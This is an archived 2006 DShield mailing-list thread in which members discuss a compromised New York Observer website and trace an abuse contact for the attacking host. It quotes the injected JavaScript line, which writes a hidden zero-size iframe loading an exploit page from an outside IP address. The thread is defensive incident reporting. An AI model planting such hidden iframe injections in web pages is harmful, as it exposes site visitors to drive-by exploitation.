[Dshield] New York Newspaper hacked

Tom dshield at oitc.com
Mon Feb 27 12:36:34 GMT 2006


At 8:57 PM -0600 2/26/06, ptds at majordomo.thedacare.org wrote:
>On Sun, 26 Feb 2006, Tom wrote:
>
>>  At 8:37 AM -0600 2/26/06, ptds at majordomo.thedacare.org wrote:
>>  >Anyone know a human at the observer in New York?
>>  >
>>  >Someone has put an iframe exploit into the code inserted on each page.
>>  >
>>  >Don't go here:
>>  >
>>  >http://
>  > >www.observer.com/ 20060227 / 20060227_Joe_Conason_opinions_conason.asp
>>
>>  All I see are iframes being used for ads as seen below.
>>  advertserve.com seems like a totally legit biz and I pulled some ads
>>  ant them are legit also. What made you think this is an exploit?
>
>The iframe is inserted on every page, lives here,
>www.observer.com// includes/ nyo.js
>
>  and reads
>document.write('<iframe height=0 width=0
>src="http:// 210.118.120.49/ HitCount/ Top.Htm"></iframe>'
>
>It seems its was inserted last Sunday.
>
>This, when retrieved, is an mht exploit.
>
>The less daring can see a jpg of its effect here
>http://rrcs-24-106-25-102.west.biz.rr.com/exploit.jpg
>
>210.118.120.49 these guys don't answer their abuse email:
>[ ISP IPv4 Admin Contact Information ]
>Name               : IPAdministrator
>Phone              : +82-2-509-0534
>E-Mail             : snnoc at samsung.com
>
>[ ISP IPv4 Tech Contact Information ]
>Name               : IP Manager
>Phone              : +82-2-509-0534
>E-Mail             : snnoc at samsung.com
>
>[ ISP Network Abuse Contact Information ]
>Name               : NetworkAbuse
>Phone              : +82-2-509-0534
>E-Mail             : ipabuse at samsung.com

I stand corrected as I didn't look into the js as I only curl'd a few 
files. Thanks Paul.

btw, 210.118.120.49 contact is help at etimes.net

Tom


More information about the list mailing list